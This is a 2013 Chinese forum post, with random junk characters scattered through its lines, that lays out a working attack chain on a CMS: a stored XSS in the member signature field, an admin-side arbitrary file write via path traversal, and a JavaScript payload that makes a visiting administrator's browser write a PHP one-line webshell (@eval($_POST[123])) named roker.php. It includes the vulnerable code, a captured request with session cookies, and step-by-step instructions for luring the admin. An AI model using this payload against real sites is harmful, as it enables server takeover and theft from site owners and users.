|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题. }. y/ i. c- w$ e8 b: c& a4 ^
官网已经修补了,所以重新下了源码2 C Z+ m. Z0 D6 F; E, D
因为 后台登入 还需要认证码 所以 注入就没看了。0 Q$ r/ C6 g4 L! S q1 ^; L- g
存在 xss8 v5 u, @# F' q
漏洞文件 user/member/skin_edit.php
g# P) K( o) `4 z% A7 E6 O4 E本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
5 n6 {" ~7 e' S% t8 x ]4 B9 V. c5 O# ]4 v) N
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>' Z+ B0 v7 N4 n6 N5 T
, N! A2 G5 ]: O' l; _, K5 X
</textarea></td></tr>5 ^( L; D) @3 m$ m5 i O
! T7 ^2 N) C( d9 h$ j- P/ P- r user/do.php
* A) ^. G: ?) O# L' E/ k9 U
. i( r( m# |4 I" o5 `: J9 O# \
9 n: y) | J. x' v( Y2 H6 \5 Jif($op=='zl'){ //资料
: v l% Y5 ^ ~, @4 h; O' w+ t 9 W/ Z& E( a( B' T
if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
0 ]- |8 B0 b; a: l3 x exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));7 C( N# e8 W8 g- P3 F& \! k" V
9 q9 Q, A% X2 t" r2 U( [
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',& Z* |) a" n% q& Y: T* H
5 l2 y- u! L5 k1 l) ?$ k CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
5 k+ c9 A+ t+ l8 w where CS_Name='".$cscms_name."'";+ h9 t& y3 s, ^0 D N* }
$ t9 Z4 x- X7 D* x% [( U if($db->query($sql)){; Q6 N& Y. w5 _1 X3 V
1 j1 K: s! |6 H) T% g7 h exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
! B1 @7 M* R% d! k6 i 5 T, L+ g1 Z$ e" Z6 L5 p& `+ a3 D# c5 z
}else{( V) ~8 V# W, D% `- E y
$ `$ z+ {; _- F0 h+ k8 J9 x! M& h exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));+ a) z+ O& q+ y" n' a v& x
$ d- G! a. I) z, W) h3 x
}: [& S2 z% K( K# k7 J
/ V6 {" [! F4 f* }2 j2 U% \+ \0 n) I# @4 A7 f
没有 过滤导致xss产生。
8 {3 N0 ^3 k, d* [后台 看了下 很奇葩的是可以写任意格式文件。。
$ z7 ?" O4 W/ G! T抓包。。+ Q6 l5 ] f3 Y7 S
- Y8 s' ~/ I" r* N& i: O# @# L) B/ u2 T$ l" _4 @
本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1' \1 ` n0 @( S7 n7 L3 [- W) i5 [
0 F" g5 w$ p! z1 f y
Accept: text/html, application/xhtml+xml, */*3 R3 A/ G. _: K. l& ]
1 d8 R2 L% U7 b* v) M4 i8 v# D
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
2 @( v8 R9 X) Z+ G A4 Q; V 3 ]. O# o; o6 a0 r( }" e2 q
Accept-Language: zh-CN( z E. H, l, u) w: U
, r# k0 N# A0 o( gUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
1 Y+ [% y+ I Z% {& U , W. H: @$ c. a; G2 N, b: @
Content-Type: application/x-www-form-urlencoded
0 [- ~! Y! E% E8 g A
" ]+ D& r. O) l3 j, ^' RAccept-Encoding: gzip, deflate4 J! A( k1 Y% P) c
( p( L- R5 g' f4 V/ FHost: 127.0.0.1- H4 z2 a) A; `1 c" G1 h
- m( Q* b I, k9 j$ pContent-Length: 38. h: U' H9 U8 B ]2 e$ R
% ?& {5 {7 @# _' ~; H0 C$ H
DNT: 1
: \% U3 u Q! v' @& o$ j 8 G( d2 |7 J6 j! U: `
Connection: Keep-Alive( T( S1 I7 L, o5 x
/ ?2 T+ X ~- {
Cache-Control: no-cache
9 n I5 ^9 a" a0 m / ~2 b+ ^% `8 u/ @4 m
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594; [: i: \. |5 f$ U0 N/ J
! _' D" H5 t" I( {6 \- l1 d9 }1 e
C9 L0 t, B \$ x8 S% i: C
name=aaa.php&content=%3Cs%3E%3Ca%25%3E6 ]# A. ~; C( Y& `
( k' ^* v- a0 \; {. X3 I
% S' n5 x$ o8 F7 {- b7 X% N
) e: B( T) T& }+ `于是 构造js如下。
/ m [' n: N7 a/ a3 t# [% S- @; L0 m1 V, I9 f0 \/ G! p: i$ Z7 q
本帖隐藏的内容<script>
. C) F( H$ L* G3 o/ g R3 mthisTHost = top.location.hostname;6 F" g+ k) l# S* F
0 `, `3 ?! G ^2 w! U
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";1 `9 A' g+ T/ p+ l- [9 Q
- b. b: ^, I s! I
function PostSubmit(url, data, msg) { / C/ j% `0 a! Z7 k# _8 U
var postUrl = url;/ O. E/ i! B6 r A
( O, s# J5 M: T1 L1 a- z4 K
var postData = data;
/ q( K* V8 b$ Y9 |8 C var msgData = msg;
" k( T; }3 v& C var ExportForm = document.createElement("FORM");
+ U4 A0 m Y" H document.body.appendChild(ExportForm);
! V4 p Y/ Z' ~ ExportForm.method = "POST"; : M8 f6 }- D' W0 \
var newElement = document.createElement("input"); ' C, h2 e! l7 H" q
newElement.setAttribute("name", "name"); 2 p% b" N( g. [. a
newElement.setAttribute("type", "hidden"); 1 d9 f4 m$ o( L( ^3 L# ~
var newElement2 = document.createElement("input"); : \3 H. b; W1 H: \& m$ r% P7 R
newElement2.setAttribute("name", "content");
6 i, `: s% C5 j! T) o' O1 G: C7 q newElement2.setAttribute("type", "hidden"); # q ?3 I4 w4 c# I3 N
ExportForm.appendChild(newElement); . b2 o( O a, U* P5 z
ExportForm.appendChild(newElement2); 4 O0 d$ h& e1 R7 X
newElement.value = postData;
5 |6 _8 ]/ {" P2 d% i/ [8 m newElement2.value = msgData; 8 B/ _& R. E W1 |
ExportForm.action = postUrl;
# f% p, S3 h% r( w ExportForm.submit();
2 ?, }+ z1 E6 r. ]" Y" X6 L};: N9 W- i. ^4 Z) c5 G
# N% d' W8 W$ b9 c/ {1 [
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
6 ` w9 k7 d" t
! C1 [; q+ F% {: q</script>+ v# y; O# l' r4 S0 v& Q7 v
4 L9 D( A$ d$ e
* f2 |5 y5 J5 Y0 P" [7 r; Y
6 Y* l; @) p( s% L! Rhttp://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入! i2 Y" z; ?7 k' I& R+ b$ c
用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改), y8 a; t7 U- r4 W& f% R# R2 ^4 s' U
就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
" a S/ f2 m+ A% z# R |
|
发表于 2013-11-6 18:09:37
收藏
支持
反对